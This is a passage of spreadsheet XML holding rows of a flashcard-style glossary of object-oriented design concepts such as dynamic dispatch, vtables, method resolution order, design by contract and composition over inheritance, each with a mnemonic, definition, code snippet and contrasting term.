          <t>Inheritance &amp; its pitfalls</t>
        </is>
      </c>
    </row>
    <row r="432">
      <c r="A432" t="n">
        <v>0</v>
      </c>
      <c r="B432" t="inlineStr">
        <is>
          <t>430</t>
        </is>
      </c>
      <c r="C432" t="inlineStr">
        <is>
          <t>Subtype polymorphism</t>
        </is>
      </c>
      <c r="D432" t="inlineStr">
        <is>
          <t>A shape-shifter troupe answers one casting call: the director shouts 'ACT!' and each — wolf, mist, knight — performs it in its own form. Many shapes (POLY-MORPH), one cue.</t>
        </is>
      </c>
      <c r="E432" t="inlineStr">
        <is>
          <t>Code written against a base type works with any subtype; the same call runs each object's own override.</t>
        </is>
      </c>
      <c r="F432" t="inlineStr">
        <is>
          <t>for a in [Dog(), Cat(), Duck()]: / print(a.speak()) # woof meow quack</t>
        </is>
      </c>
      <c r="G432" t="inlineStr">
        <is>
          <t>Parametric polymorphism (generics) — generics vary the TYPE parameter; subtype polymorphism varies BEHAVIOR via overrides.</t>
        </is>
      </c>
      <c r="H432" t="inlineStr">
        <is>
          <t>One universal remote driving many devices.</t>
        </is>
      </c>
      <c r="J432" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K432" t="inlineStr">
        <is>
          <t>Polymorphism &amp; dispatch</t>
        </is>
      </c>
    </row>
    <row r="433">
      <c r="A433" t="n">
        <v>0</v>
      </c>
      <c r="B433" t="inlineStr">
        <is>
          <t>431</t>
        </is>
      </c>
      <c r="C433" t="inlineStr">
        <is>
          <t>Dynamic dispatch</t>
        </is>
      </c>
      <c r="D433" t="inlineStr">
        <is>
          <t>A taxi DISPATCHER who refuses to assign a cab until the call comes in: she looks at who is actually standing on the curb (runtime object), not the name typed on the booking (declared type).</t>
        </is>
      </c>
      <c r="E433" t="inlineStr">
        <is>
          <t>At runtime, the actual object's class—not the variable's declared type—selects which method implementation executes.</t>
        </is>
      </c>
      <c r="F433" t="inlineStr">
        <is>
          <t>a: Animal = Dog() / a.speak() # runs Dog.speak at runtime</t>
        </is>
      </c>
      <c r="G433" t="inlineStr">
        <is>
          <t>Static dispatch — static dispatch is fixed at compile time by declared type; dynamic uses the runtime object's class.</t>
        </is>
      </c>
      <c r="H433" t="inlineStr">
        <is>
          <t>A switchboard operator patching calls live.</t>
        </is>
      </c>
      <c r="J433" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K433" t="inlineStr">
        <is>
          <t>Polymorphism &amp; dispatch</t>
        </is>
      </c>
    </row>
    <row r="434">
      <c r="A434" t="n">
        <v>0</v>
      </c>
      <c r="B434" t="inlineStr">
        <is>
          <t>432</t>
        </is>
      </c>
      <c r="C434" t="inlineStr">
        <is>
          <t>Vtable</t>
        </is>
      </c>
      <c r="D434" t="inlineStr">
        <is>
          <t>Every object wears a lanyard pointing to its family's phone TABLE: slot 3 is labeled 'speak', and dialing slot 3 rings whichever number that family wrote there.</t>
        </is>
      </c>
      <c r="E434" t="inlineStr">
        <is>
          <t>Per-class table of method pointers; each object carries a pointer to its class's table, making a virtual call an indexed lookup.</t>
        </is>
      </c>
      <c r="F434" t="inlineStr">
        <is>
          <t>obj -&gt; vptr -&gt; [&amp;speak, &amp;eat, ...] / call speak == jump to table[0]</t>
        </is>
      </c>
      <c r="G434" t="inlineStr">
        <is>
          <t>Python attribute lookup — Python searches dicts along the MRO at runtime; vtables are fixed-offset arrays compiled into C++/Java.</t>
        </is>
      </c>
      <c r="H434" t="inlineStr">
        <is>
          <t>Elevator button panels wired differently per building.</t>
        </is>
      </c>
      <c r="J434" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K434" t="inlineStr">
        <is>
          <t>Polymorphism &amp; dispatch</t>
        </is>
      </c>
    </row>
    <row r="435">
      <c r="A435" t="n">
        <v>0</v>
      </c>
      <c r="B435" t="inlineStr">
        <is>
          <t>433</t>
        </is>
      </c>
      <c r="C435" t="inlineStr">
        <is>
          <t>Late binding</t>
        </is>
      </c>
      <c r="D435" t="inlineStr">
        <is>
          <t>A wedding invitation with the officiant line left blank until the music starts — whoever actually stands at the altar that day performs the vows. Bound LATE.</t>
        </is>
      </c>
      <c r="E435" t="inlineStr">
        <is>
          <t>Deferring which method body a call names until runtime; early binding fixes the target at compile time.</t>
        </is>
      </c>
      <c r="F435" t="inlineStr">
        <is>
          <t>handler.process(order) / # body chosen only when the call executes</t>
        </is>
      </c>
      <c r="G435" t="inlineStr">
        <is>
          <t>Lazy evaluation — lazy delays computing a VALUE; late binding delays choosing WHICH CODE runs.</t>
        </is>
      </c>
      <c r="H435" t="inlineStr">
        <is>
          <t>A relay baton handed to whoever is in the lane at that moment.</t>
        </is>
      </c>
      <c r="J435" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K435" t="inlineStr">
        <is>
          <t>Polymorphism &amp; dispatch</t>
        </is>
      </c>
    </row>
    <row r="436">
      <c r="A436" t="n">
        <v>0</v>
      </c>
      <c r="B436" t="inlineStr">
        <is>
          <t>434</t>
        </is>
      </c>
      <c r="C436" t="inlineStr">
        <is>
          <t>Static vs dynamic type</t>
        </is>
      </c>
      <c r="D436" t="inlineStr">
        <is>
          <t>A dog in a trench coat labeled ANIMAL: the customs officer reads the coat (static type), but the bark comes from the dog inside (dynamic type).</t>
        </is>
      </c>
      <c r="E436" t="inlineStr">
        <is>
          <t>The static type is what the variable is declared as; the dynamic type is the class of the object it holds right now.</t>
        </is>
      </c>
      <c r="F436" t="inlineStr">
        <is>
          <t>Animal a = new Dog(); / // static: Animal (what compiler checks) / // dynamic: Dog (what dispatch uses)</t>
        </is>
      </c>
      <c r="G436" t="inlineStr">
        <is>
          <t>Casting — a cast changes only the static view; the object's dynamic type never changes.</t>
        </is>
      </c>
      <c r="H436" t="inlineStr">
        <is>
          <t>The label on an envelope versus the letter inside.</t>
        </is>
      </c>
      <c r="J436" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K436" t="inlineStr">
        <is>
          <t>Polymorphism &amp; dispatch</t>
        </is>
      </c>
    </row>
    <row r="437">
      <c r="A437" t="n">
        <v>0</v>
      </c>
      <c r="B437" t="inlineStr">
        <is>
          <t>435</t>
        </is>
      </c>
      <c r="C437" t="inlineStr">
        <is>
          <t>Ad hoc polymorphism</t>
        </is>
      </c>
      <c r="D437" t="inlineStr">
        <is>
          <t>A Swiss Army knife labeled CUT: a saw folds out for wood, scissors for paper, a blade for bread - same handle, a different tool snaps out per material.</t>
        </is>
      </c>
      <c r="E437" t="inlineStr">
        <is>
          <t>One function name, several separate implementations chosen by argument types - overloading picks a different body per signature.</t>
        </is>
      </c>
      <c r="F437" t="inlineStr">
        <is>
          <t>C++: print(int); print(string); print(double)  // compiler picks by argument type</t>
        </is>
      </c>
      <c r="G437" t="inlineStr">
        <is>
          <t>vs parametric polymorphism/generics (39x): generics run ONE body for all types; overloading selects among DIFFERENT bodies | vs override (421): overload differs in signature at compile time; override replaces the same signature at runtime</t>
        </is>
      </c>
      <c r="H437" t="inlineStr">
        <is>
          <t>a vending machine with one button per snack shape</t>
        </is>
      </c>
      <c r="J437" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K437" t="inlineStr">
        <is>
          <t>Polymorphism &amp; dispatch</t>
        </is>
      </c>
    </row>
    <row r="438">
      <c r="A438" t="n">
        <v>0</v>
      </c>
      <c r="B438" t="inlineStr">
        <is>
          <t>436</t>
        </is>
      </c>
      <c r="C438" t="inlineStr">
        <is>
          <t>Method resolution order (MRO)</t>
        </is>
      </c>
      <c r="D438" t="inlineStr">
        <is>
          <t>A fire-drill roster taped by the door: when the alarm (method call) rings, the ancestors line up single file in one fixed order, and the first one holding an extinguisher acts.</t>
        </is>
      </c>
      <c r="E438" t="inlineStr">
        <is>
          <t>The deterministic linear order (C3 in Python) in which a class and its ancestors are searched for an attribute or method.</t>
        </is>
      </c>
      <c r="F438" t="inlineStr">
        <is>
          <t>class D(B, C): ... / D.__mro__ # (D, B, C, A, object)</t>
        </is>
      </c>
      <c r="G438" t="inlineStr">
        <is>
          <t>super — super does not call 'the parent'; it calls the NEXT class in the MRO, which can be a sibling.</t>
        </is>
      </c>
      <c r="H438" t="inlineStr">
        <is>
          <t>A royal line-of-succession chart.</t>
        </is>
      </c>
      <c r="J438" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K438" t="inlineStr">
        <is>
          <t>Polymorphism &amp; dispatch</t>
        </is>
      </c>
    </row>
    <row r="439">
      <c r="A439" t="n">
        <v>0</v>
      </c>
      <c r="B439" t="inlineStr">
        <is>
          <t>437</t>
        </is>
      </c>
      <c r="C439" t="inlineStr">
        <is>
          <t>Double dispatch</t>
        </is>
      </c>
      <c r="D439" t="inlineStr">
        <is>
          <t>Two masked dancers meet at the masquerade: the first unmasks ('I am Rock!'), then bows so the other unmasks and picks the duet step ('then I, Paper, wrap you'). Two reveals choose one move.</t>
        </is>
      </c>
      <c r="E439" t="inlineStr">
        <is>
          <t>The executed code depends on the runtime types of TWO objects, achieved via two chained virtual calls (heart of Visitor).</t>
        </is>
      </c>
      <c r="F439" t="inlineStr">
        <is>
          <t>shape.accept(visitor) # dispatch 1 / def accept(self, v): / v.visit_circle(self) # dispatch 2</t>
        </is>
      </c>
      <c r="G439" t="inlineStr">
        <is>
          <t>Multiple dispatch — multimethods pick on all argument types natively; double dispatch simulates it with two single dispatches.</t>
        </is>
      </c>
      <c r="H439" t="inlineStr">
        <is>
          <t>A rock-paper-scissors referee ruling from both hands.</t>
        </is>
      </c>
      <c r="J439" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K439" t="inlineStr">
        <is>
          <t>Polymorphism &amp; dispatch</t>
        </is>
      </c>
    </row>
    <row r="440">
      <c r="A440" t="n">
        <v>0</v>
      </c>
      <c r="B440" t="inlineStr">
        <is>
          <t>438</t>
        </is>
      </c>
      <c r="C440" t="inlineStr">
        <is>
          <t>Multiple dispatch</t>
        </is>
      </c>
      <c r="D440" t="inlineStr">
        <is>
          <t>A club bouncer scans EVERY guest's badge at once before choosing the playlist: wolf plus vampire gets organ metal, wolf plus wolf gets howling techno.</t>
        </is>
      </c>
      <c r="E440" t="inlineStr">
        <is>
          <t>Language feature (CLOS, Julia) that selects a method on the runtime types of ALL arguments at once, not just the receiver.</t>
        </is>
      </c>
      <c r="F440" t="inlineStr">
        <is>
          <t>@dispatch(Cat, Mouse) / def meet(a, b): return 'chase' / # Julia: meet(a::Cat, b::Mouse)</t>
        </is>
      </c>
      <c r="G440" t="inlineStr">
        <is>
          <t>Overloading — overloading resolves on static compile-time argument types; multiple dispatch uses runtime types.</t>
        </is>
      </c>
      <c r="H440" t="inlineStr">
        <is>
          <t>A chemical reaction determined by both reagents.</t>
        </is>
      </c>
      <c r="J440" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K440" t="inlineStr">
        <is>
          <t>Polymorphism &amp; dispatch</t>
        </is>
      </c>
    </row>
    <row r="441">
      <c r="A441" t="n">
        <v>0</v>
      </c>
      <c r="B441" t="inlineStr">
        <is>
          <t>439</t>
        </is>
      </c>
      <c r="C441" t="inlineStr">
        <is>
          <t>Replace switch-on-type with polymorphism</t>
        </is>
      </c>
      <c r="D441" t="inlineStr">
        <is>
          <t>A hallway of doors, each with its own doorman, replaces the lobby clerk flipping a giant laminated flowchart ('if wolf... elif duck...'). New guest? Just add a door.</t>
        </is>
      </c>
      <c r="E441" t="inlineStr">
        <is>
          <t>Refactoring: turn if/switch chains on type tags into an overridden method, so adding a type requires no edits to existing branches.</t>
        </is>
      </c>
      <c r="F441" t="inlineStr">
        <is>
          <t>bad: if kind=='circle': pi*r*r elif ... / good: shape.area() # each class knows its own</t>
        </is>
      </c>
      <c r="G441" t="inlineStr">
        <is>
          <t>Strategy pattern — strategy swaps a behavior per object at runtime; this refactor moves the branches into the type hierarchy.</t>
        </is>
      </c>
      <c r="H441" t="inlineStr">
        <is>
          <t>Vending-machine buttons versus one clerk with a rulebook.</t>
        </is>
      </c>
      <c r="J441" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K441" t="inlineStr">
        <is>
          <t>Polymorphism &amp; dispatch</t>
        </is>
      </c>
    </row>
    <row r="442">
      <c r="A442" t="n">
        <v>0</v>
      </c>
      <c r="B442" t="inlineStr">
        <is>
          <t>440</t>
        </is>
      </c>
      <c r="C442" t="inlineStr">
        <is>
          <t>Abstraction</t>
        </is>
      </c>
      <c r="D442" t="inlineStr">
        <is>
          <t>A car's steering wheel: you turn one leather ring while tie rods, rack and pinion vanish below the dashboard. The wheel IS the idea 'go left'.</t>
        </is>
      </c>
      <c r="E442" t="inlineStr">
        <is>
          <t>Exposing only the essential features of a thing while omitting irrelevant detail, so users think in concepts, not mechanisms.</t>
        </is>
      </c>
      <c r="F442" t="inlineStr">
        <is>
          <t>file.read() # not: move disk head, / # follow inodes, buffer sectors</t>
        </is>
      </c>
      <c r="G442" t="inlineStr">
        <is>
          <t>Encapsulation — encapsulation enforces access control; abstraction chooses which concepts exist at all.</t>
        </is>
      </c>
      <c r="H442" t="inlineStr">
        <is>
          <t>A subway map versus the satellite photo.</t>
        </is>
      </c>
      <c r="J442" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K442" t="inlineStr">
        <is>
          <t>Abstraction, interfaces &amp; contracts</t>
        </is>
      </c>
    </row>
    <row r="443">
      <c r="A443" t="n">
        <v>0</v>
      </c>
      <c r="B443" t="inlineStr">
        <is>
          <t>441</t>
        </is>
      </c>
      <c r="C443" t="inlineStr">
        <is>
          <t>Interface</t>
        </is>
      </c>
      <c r="D443" t="inlineStr">
        <is>
          <t>A wall socket FACEplate: three holes in a standard shape. Any appliance with the matching plug just runs — you never see the wiring behind the plate.</t>
        </is>
      </c>
      <c r="E443" t="inlineStr">
        <is>
          <t>A named contract listing method signatures without implementation; classes implement it, and callers depend only on it.</t>
        </is>
      </c>
      <c r="F443" t="inlineStr">
        <is>
          <t>class Speaker(Protocol): / def speak(self) -&gt; str: ...</t>
        </is>
      </c>
      <c r="G443" t="inlineStr">
        <is>
          <t>Abstract class — abstract classes may carry fields and code; an interface is pure signatures, contract only.</t>
        </is>
      </c>
      <c r="H443" t="inlineStr">
        <is>
          <t>A job description with no employee named.</t>
        </is>
      </c>
      <c r="J443" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K443" t="inlineStr">
        <is>
          <t>Abstraction, interfaces &amp; contracts</t>
        </is>
      </c>
    </row>
    <row r="444">
      <c r="A444" t="n">
        <v>0</v>
      </c>
      <c r="B444" t="inlineStr">
        <is>
          <t>442</t>
        </is>
      </c>
      <c r="C444" t="inlineStr">
        <is>
          <t>Program to an interface</t>
        </is>
      </c>
      <c r="D444" t="inlineStr">
        <is>
          <t>A DJ mixes on standard quarter-inch jacks: any brand of headphones snaps in mid-set. He never solders one Sony cable straight into the console.</t>
        </is>
      </c>
      <c r="E444" t="inlineStr">
        <is>
          <t>Depend on abstract contracts, not concrete classes, so implementations can be swapped without touching calling code.</t>
        </is>
      </c>
      <c r="F444" t="inlineStr">
        <is>
          <t>def notify(s: MessageSender): ... / notify(Email()); notify(Slack())</t>
        </is>
      </c>
      <c r="G444" t="inlineStr">
        <is>
          <t>Dependency inversion — DIP adds WHO owns the abstraction (the high-level policy); this maxim just says to use one.</t>
        </is>
      </c>
      <c r="H444" t="inlineStr">
        <is>
          <t>A universal charging port on every device.</t>
        </is>
      </c>
      <c r="J444" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K444" t="inlineStr">
        <is>
          <t>Abstraction, interfaces &amp; contracts</t>
        </is>
      </c>
    </row>
    <row r="445">
      <c r="A445" t="n">
        <v>0</v>
      </c>
      <c r="B445" t="inlineStr">
        <is>
          <t>443</t>
        </is>
      </c>
      <c r="C445" t="inlineStr">
        <is>
          <t>Design by contract</t>
        </is>
      </c>
      <c r="D445" t="inlineStr">
        <is>
          <t>Two lawyers slide a CONTRACT across the table before every call: 'You bring valid input (pre); I guarantee this result (post); the office stays intact (invariant).' Breach means bug, and blame is assigned by clause.</t>
        </is>
      </c>
      <c r="E445" t="inlineStr">
        <is>
          <t>Meyer's discipline: each method states preconditions, postconditions, and invariants as formal obligations between caller and callee.</t>
        </is>
      </c>
      <c r="F445" t="inlineStr">
        <is>
          <t>require amount &gt; 0 / ensure balance == old_balance - amount</t>
        </is>
      </c>
      <c r="G445" t="inlineStr">
        <is>
          <t>Defensive programming — defensive code re-checks everything everywhere; contracts assign each check to exactly one party.</t>
        </is>
      </c>
      <c r="H445" t="inlineStr">
        <is>
          <t>A pre-flight checklist signed by both pilot and tower.</t>
        </is>
      </c>
      <c r="J445" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K445" t="inlineStr">
        <is>
          <t>Abstraction, interfaces &amp; contracts</t>
        </is>
      </c>
    </row>
    <row r="446">
      <c r="A446" t="n">
        <v>0</v>
      </c>
      <c r="B446" t="inlineStr">
        <is>
          <t>444</t>
        </is>
      </c>
      <c r="C446" t="inlineStr">
        <is>
          <t>Preconditions &amp; postconditions</t>
        </is>
      </c>
      <c r="D446" t="inlineStr">
        <is>
          <t>Airport rules: YOU must show up with a valid boarding pass (pre); the AIRLINE must land your suitcase on the belt (post). Each side owns its clause.</t>
        </is>
      </c>
      <c r="E446" t="inlineStr">
        <is>
          <t>Precondition: what must be true before a call (caller's duty). Postcondition: what the method guarantees afterward (callee's duty).</t>
        </is>
      </c>
      <c r="F446" t="inlineStr">
        <is>
          <t>def sqrt(x): # pre: x &gt;= 0 / ... / # post: result*result == x</t>
        </is>
      </c>
      <c r="G446" t="inlineStr">
        <is>
          <t>Invariant — pre/post bracket ONE call; an invariant must hold between ALL calls for the object's lifetime.</t>
        </is>
      </c>
      <c r="H446" t="inlineStr">
        <is>
          <t>A recipe's you-will-need list versus the photo of the finished dish.</t>
        </is>
      </c>
      <c r="J446" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K446" t="inlineStr">
        <is>
          <t>Abstraction, interfaces &amp; contracts</t>
        </is>
      </c>
    </row>
    <row r="447">
      <c r="A447" t="n">
        <v>0</v>
      </c>
      <c r="B447" t="inlineStr">
        <is>
          <t>445</t>
        </is>
      </c>
      <c r="C447" t="inlineStr">
        <is>
          <t>Minimal API surface</t>
        </is>
      </c>
      <c r="D447" t="inlineStr">
        <is>
          <t>A submarine with ONE small hatch: every extra porthole you cut is a spot the ocean (your users) will pry at forever.</t>
        </is>
      </c>
      <c r="E447" t="inlineStr">
        <is>
          <t>Expose the smallest set of public methods and types that serves clients; every extra public item is a forever-maintenance promise.</t>
        </is>
      </c>
      <c r="F447" t="inlineStr">
        <is>
          <t>public: connect(), send() / private: retry logic, socket pool, / framing, backoff</t>
        </is>
      </c>
      <c r="G447" t="inlineStr">
        <is>
          <t>Information hiding — hiding concerns which decisions internals conceal; minimal surface counts what is public at all.</t>
        </is>
      </c>
      <c r="H447" t="inlineStr">
        <is>
          <t>A five-dish menu versus a 200-dish menu.</t>
        </is>
      </c>
      <c r="J447" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K447" t="inlineStr">
        <is>
          <t>Abstraction, interfaces &amp; contracts</t>
        </is>
      </c>
    </row>
    <row r="448">
      <c r="A448" t="n">
        <v>0</v>
      </c>
      <c r="B448" t="inlineStr">
        <is>
          <t>446</t>
        </is>
      </c>
      <c r="C448" t="inlineStr">
        <is>
          <t>Leaky abstraction</t>
        </is>
      </c>
      <c r="D448" t="inlineStr">
        <is>
          <t>A shiny chrome faucet labeled PURE WATER burps rust one morning — suddenly you are studying the building's entire pipe map. The plumbing LEAKED through.</t>
        </is>
      </c>
      <c r="E448" t="inlineStr">
        <is>
          <t>Spolsky's law: all non-trivial abstractions leak—the hidden layer's quirks (latency, failures) surface and force users to learn it.</t>
        </is>
      </c>
      <c r="F448" t="inlineStr">
        <is>
          <t>ORM hides SQL until one slow query; / now you must read the generated JOINs</t>
        </is>
      </c>
      <c r="G448" t="inlineStr">
        <is>
          <t>Bad abstraction — a wrong abstraction misfits its concept; a leaky one fits, yet the substrate still bleeds through under stress.</t>
        </is>
      </c>
      <c r="H448" t="inlineStr">
        <is>
          <t>A soundproof wall that thumps during bass drops.</t>
        </is>
      </c>
      <c r="J448" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K448" t="inlineStr">
        <is>
          <t>Abstraction, interfaces &amp; contracts</t>
        </is>
      </c>
    </row>
    <row r="449">
      <c r="A449" t="n">
        <v>0</v>
      </c>
      <c r="B449" t="inlineStr">
        <is>
          <t>447</t>
        </is>
      </c>
      <c r="C449" t="inlineStr">
        <is>
          <t>Abstract data type</t>
        </is>
      </c>
      <c r="D449" t="inlineStr">
        <is>
          <t>A vending machine spec sheet listing only the buttons and what must come out; whether springs or elves work inside is officially none of your business.</t>
        </is>
      </c>
      <c r="E449" t="inlineStr">
        <is>
          <t>A type defined purely by its operations and their laws - stack means push/pop/LIFO - with the representation deliberately unspecified.</t>
        </is>
      </c>
      <c r="F449" t="inlineStr">
        <is>
          <t>Stack: push(x), pop() -&gt; last x in / array-backed or list-backed, callers cannot tell</t>
        </is>
      </c>
      <c r="G449" t="inlineStr">
        <is>
          <t>vs interface (441): an interface is a language construct; an ADT is the mathematical contract an interface may encode</t>
        </is>
      </c>
      <c r="H449" t="inlineStr">
        <is>
          <t>sealed black appliance with labeled buttons</t>
        </is>
      </c>
      <c r="J449" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K449" t="inlineStr">
        <is>
          <t>Abstraction, interfaces &amp; contracts</t>
        </is>
      </c>
    </row>
    <row r="450">
      <c r="A450" t="n">
        <v>0</v>
      </c>
      <c r="B450" t="inlineStr">
        <is>
          <t>448</t>
        </is>
      </c>
      <c r="C450" t="inlineStr">
        <is>
          <t>Single level of abstraction</t>
        </is>
      </c>
      <c r="D450" t="inlineStr">
        <is>
          <t>A speech that lurches from 'We shall win the war!' to 'tighten bolt #4 to 12 newton-meters' — the audience gets altitude whiplash. One speech, one altitude.</t>
        </is>
      </c>
      <c r="E450" t="inlineStr">
        <is>
          <t>Within one function, keep all statements at the same conceptual altitude: never mix high-level steps with bit-twiddling detail.</t>
        </is>
      </c>
      <c r="F450" t="inlineStr">
        <is>
          <t>def checkout(): / validate_cart(); charge_card() / send_receipt() # all same altitude</t>
        </is>
      </c>
      <c r="G450" t="inlineStr">
        <is>
          <t>Extract method — extract method is the refactoring tool you use to restore a single level of abstraction.</t>
        </is>
      </c>
      <c r="H450" t="inlineStr">
        <is>
          <t>An elevator that stops at one floor per ride.</t>
        </is>
      </c>
      <c r="J450" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K450" t="inlineStr">
        <is>
          <t>Abstraction, interfaces &amp; contracts</t>
        </is>
      </c>
    </row>
    <row r="451">
      <c r="A451" t="n">
        <v>0</v>
      </c>
      <c r="B451" t="inlineStr">
        <is>
          <t>449</t>
        </is>
      </c>
      <c r="C451" t="inlineStr">
        <is>
          <t>Principle of least astonishment</t>
        </is>
      </c>
      <c r="D451" t="inlineStr">
        <is>
          <t>A door with a big pull handle that you must PUSH: every single visitor yanks it and stumbles. The designer, not the visitors, is wrong.</t>
        </is>
      </c>
      <c r="E451" t="inlineStr">
        <is>
          <t>Design APIs and behavior to match what users most plausibly expect; surprising side effects are defects even when documented.</t>
        </is>
      </c>
      <c r="F451" t="inlineStr">
        <is>
          <t>list.sort() returns None (mutates!) / — astonishes newcomers vs sorted(lst)</t>
        </is>
      </c>
      <c r="G451" t="inlineStr">
        <is>
          <t>Convention over configuration — conventions reduce setup choices; least astonishment governs how any behavior should feel.</t>
        </is>
      </c>
      <c r="H451" t="inlineStr">
        <is>
          <t>A gag hand-buzzer hidden in a business handshake.</t>
        </is>
      </c>
      <c r="J451" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K451" t="inlineStr">
        <is>
          <t>Abstraction, interfaces &amp; contracts</t>
        </is>
      </c>
    </row>
    <row r="452">
      <c r="A452" t="n">
        <v>0</v>
      </c>
      <c r="B452" t="inlineStr">
        <is>
          <t>450</t>
        </is>
      </c>
      <c r="C452" t="inlineStr">
        <is>
          <t>Composition</t>
        </is>
      </c>
      <c r="D452" t="inlineStr">
        <is>
          <t>A LEGO mech: snap on a drill arm, swap it for a claw at halftime. The robot is nothing but its click-together parts.</t>
        </is>
      </c>
      <c r="E452" t="inlineStr">
        <is>
          <t>Building objects out of other objects as parts, reusing behavior by containing collaborators rather than inheriting from them.</t>
        </is>
      </c>
      <c r="F452" t="inlineStr">
        <is>
          <t>class Car: / def __init__(self): / self.engine = Engine()</t>
        </is>
      </c>
      <c r="G452" t="inlineStr">
        <is>
          <t>Inheritance — inheritance is a fixed is-a bond made at class definition; composition assembles has-a parts, swappable at runtime.</t>
        </is>
      </c>
      <c r="H452" t="inlineStr">
        <is>
          <t>An orchestra composed of interchangeable players.</t>
        </is>
      </c>
      <c r="J452" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K452" t="inlineStr">
        <is>
          <t>Composition &amp; delegation</t>
        </is>
      </c>
    </row>
    <row r="453">
      <c r="A453" t="n">
        <v>0</v>
      </c>
      <c r="B453" t="inlineStr">
        <is>
          <t>451</t>
        </is>
      </c>
      <c r="C453" t="inlineStr">
        <is>
          <t>Composition over inheritance</t>
        </is>
      </c>
      <c r="D453" t="inlineStr">
        <is>
          <t>Two robot builders: one WELDS his robot onto grandpa's chassis forever (inheritance); the other clicks modules on and off in seconds and wins the derby. Buy LEGO, not welds.</t>
        </is>
      </c>
      <c r="E453" t="inlineStr">
        <is>
          <t>Prefer assembling behavior from contained parts over subclassing: fewer hierarchy traps, and parts stay swappable at runtime.</t>
        </is>
      </c>
      <c r="F453" t="inlineStr">
        <is>
          <t>bad: class Stack(list): ... / good: class Stack: / def __init__(self): self._items = []</t>
        </is>
      </c>
      <c r="G453" t="inlineStr">
        <is>
          <t>Never inherit — the principle says PREFER composition; inheritance still fits a true is-a with a stable contract.</t>
        </is>
      </c>
      <c r="H453" t="inlineStr">
        <is>
          <t>Swapping backpack tools versus surgically implanted tools.</t>
        </is>
      </c>
      <c r="J453" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K453" t="inlineStr">
        <is>
          <t>Composition &amp; delegation</t>
        </is>
      </c>
    </row>
    <row r="454">
      <c r="A454" t="n">
        <v>0</v>
      </c>
      <c r="B454" t="inlineStr">
        <is>
          <t>452</t>
        </is>
      </c>
      <c r="C454" t="inlineStr">
        <is>
          <t>Has-a vs is-a</t>
        </is>
      </c>
      <c r="D454" t="inlineStr">
        <is>
          <t>Say it aloud at the pet-store counter: 'a Dog IS an animal' (family portrait), 'a Car HAS an engine' (parts bin). Your own ear picks the design.</t>
        </is>
      </c>
      <c r="E454" t="inlineStr">
        <is>
          <t>Design test: a Car HAS-an Engine (compose), a Dog IS-an Animal (inherit); saying the sentence aloud picks the relationship.</t>
        </is>
      </c>
      <c r="F454" t="inlineStr">
        <is>
          <t>class Dog(Animal): ... # is-a / self.engine = Engine() # has-a</t>
        </is>
      </c>
      <c r="G454" t="inlineStr">
        <is>
          <t>Is-implemented-using — a Stack is implemented using a list (compose it), even though 'a stack is a list' sounds like is-a.</t>
        </is>
      </c>
      <c r="H454" t="inlineStr">
        <is>
          <t>A family tree versus a parts bin.</t>
        </is>
      </c>
      <c r="J454" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K454" t="inlineStr">
        <is>
          <t>Composition &amp; delegation</t>
        </is>
      </c>
    </row>
    <row r="455">
      <c r="A455" t="n">
        <v>0</v>
      </c>
      <c r="B455" t="inlineStr">
        <is>
          <t>453</t>
        </is>
      </c>
      <c r="C455" t="inlineStr">
        <is>
          <t>Delegation</t>
        </is>
      </c>
      <c r="D455" t="inlineStr">
        <is>
          <t>A CEO's desk with a golden chute: every letter dropped on her desk slides straight to the specialist one floor down, whose reply goes out on HER letterhead.</t>
        </is>
      </c>
      <c r="E455" t="inlineStr">
        <is>
          <t>An object handles a request by handing it to a contained helper, exposing the resulting behavior as its own.</t>
        </is>
      </c>
      <c r="F455" t="inlineStr">
        <is>
          <t>class Printer: / def print(self, doc): / return self.engine.render(doc)</t>
        </is>
      </c>
      <c r="G455" t="inlineStr">
        <is>
          <t>Inheritance — inheritance reuses by BEING the parent; delegation reuses by ASKING a part, keeping interfaces decoupled.</t>
        </is>
      </c>
      <c r="H455" t="inlineStr">
        <is>
          <t>A ventriloquist speaking through the dummy.</t>
        </is>
      </c>
      <c r="J455" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K455" t="inlineStr">
        <is>
          <t>Composition &amp; delegation</t>
        </is>
      </c>
    </row>
    <row r="456">
      <c r="A456" t="n">
        <v>0</v>
      </c>
      <c r="B456" t="inlineStr">
        <is>
          <t>454</t>
        </is>
      </c>
      <c r="C456" t="inlineStr">
        <is>
          <t>Forwarding vs delegation</t>
        </is>
      </c>
      <c r="D456" t="inlineStr">
        <is>
          <t>Two mail rooms: FORWARDING slaps a new address on the envelope, so replies go to the helper. DELEGATION sends a courier who must report back to the boss's desk (self) for every follow-up.</t>
        </is>
      </c>
      <c r="E456" t="inlineStr">
        <is>
